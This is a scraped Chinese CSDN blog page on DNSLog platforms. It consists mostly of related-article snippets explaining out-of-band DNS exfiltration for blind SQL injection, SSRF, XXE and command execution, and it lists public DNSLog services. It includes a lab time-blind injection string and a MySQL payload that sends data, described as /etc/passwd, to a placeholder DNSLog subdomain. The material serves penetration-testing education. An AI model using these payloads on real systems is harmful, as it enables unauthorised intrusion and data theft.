好用的dnslog在线平台

已于 2024-06-11 22:24:05 修改
阅读量3.3w 收藏 44
点赞数 18
分类专栏: # 基础入门 文章标签: dnslog DNSLOG
于 2023-08-21 10:35:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/132403032
版权
DNSlog平台详解
不忘初心,护天下安全!
09-21 4600
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
BurpSuite插件(BP插件、武装BP)
墨痕诉清风的博客
03-07 3248
目录 解决光标错位 HAE Domain Hunter Pro passive-scan-client-0.3.0 LinkFinder HTTPHeadModifer 解决光标错位 一般我拿到Burp必做的一件事就是把光标错位调整好: User options-Display-HTTP Message Display 黑体-24px HAE https://github.com/gh0stkey/HaE 此时才把插件导入进来,需要配置你的HAE正则。 公共规..
dnslog在线平台
Lucker_YYY的博客
08-29 1085
分享几个好用的在线平台
安全测试的辅助工具之DNSLog 平台
最新发布
西京刀客
03-27 333
DNSLog 是一种用于安全测试的辅助工具,主要用于检测 无回显漏洞(如 SSRF、Blind SQLi、XXE 等)。它的核心原理是通过 DNS 协议记录目标服务器发起的 DNS 查询请求,从而间接验证漏洞的存在。
【转载】分享几个好用的在线DNSLOG网站
潇逗
02-14 655
dnslog平台分享
Sql注入漏洞汇总-上
黑战士的博客
06-04 809
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
DNSlog介绍
热门推荐
告白的博客
07-09 2万+
0x00 DNSlog 介绍 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件, 0x01 DNSlog回显原理 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gao
分享一个dnslog在线平台
2301_76297780的博客
06-19 746
分享一个dnslog在线平台
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 6148
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台DNSLog平台非常的多,但是实际上大部分的DNSLog平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
DNSlog
遇事不决冲冲冲
08-08 9691
什么是DNSlog DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。 原理 payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog平台上,通过读取这些解析的日志,来获取信息。 使用方法 通过Burp Suite 通过在线平台 http://www.dnslog.cn/ http://ceye.io/ 利用场景 执行命令时没
DNSlog使用
weixin_48000706的博客
07-31 1658
【代码】DNSlog使用。
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
基于开源软件的DNS查询日志分析系统.pdf
07-25
基于开源软件的DNS查询日志分析系统。 Keywords : domainnamesystem ; bind ; bigdata ; loganalysis ; visualization ; automationdeployment
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 952
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。
《漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1998
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞吗
2401_84972870的博客
05-16 911
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 7111
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
dnslog平台作用
02-19
### DNSLog平台的功能和用途 DNSLog平台主要用于安全研究和渗透测试领域,其核心功能是在无法通过常规网络流量直接回传数据的情况下,利用DNS查询机制实现信息泄露。当目标系统向特定的子域名发起DNS解析请求时,这些请求会被转发至DNSLog服务器并记录下来。 #### 功能描述 - **注册与配置** 用户需先在支持该服务的网站上创建账户,并获得一个唯一的顶级域(如`example.dnslog.cn`),用于后续操作中的唯一标识[^1]。 - **数据收集** 渗透测试人员可以构造特殊的URL或其他形式的数据包,使得目标机器尝试访问由上述个人专属子域名构成的内容。由于大多数防火墙不会阻止对外部公共DNS服务器的标准端口53上的通信,因此即使在网络受限环境中也能成功触发外部连接[^2]。 - **日志审查** 所有经由此方式产生的DNS查询都会被集中存储于用户的私人控制面板内供查阅。这允许研究人员轻松追踪任何企图联系指定主机的行为模式及其携带的信息片段——比如文件路径、参数值甚至是完整的HTTP头部字段等敏感资料。 #### 应用场景举例 对于SQL注入漏洞而言,在某些情况下数据库返回的结果可能不便于直接显示给客户端浏览器;此时借助DNSLog则可以通过精心设计payload让受害站点执行带有恶意命令字符串的语句,进而间接地把内部状态反馈出来以便进一步分析确认是否存在可利用之处。 ```sql IF (SELECT ASCII(SUBSTRING(@@version,1,1))) > 0 THEN SLEEP(5); ELSE SELECT LOAD_FILE(CONCAT('\\\\', 'your-dnslog-subdomain.here','/etc/passwd')); END IF; ``` 此代码段展示了如何在一个假设性的MySQL环境中实施基于时间延迟判断版本号首位字符是否大于零的同时尝试读取远程Linux系统的密码文件并通过DNS请求将其部分或全部内容传递出去。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值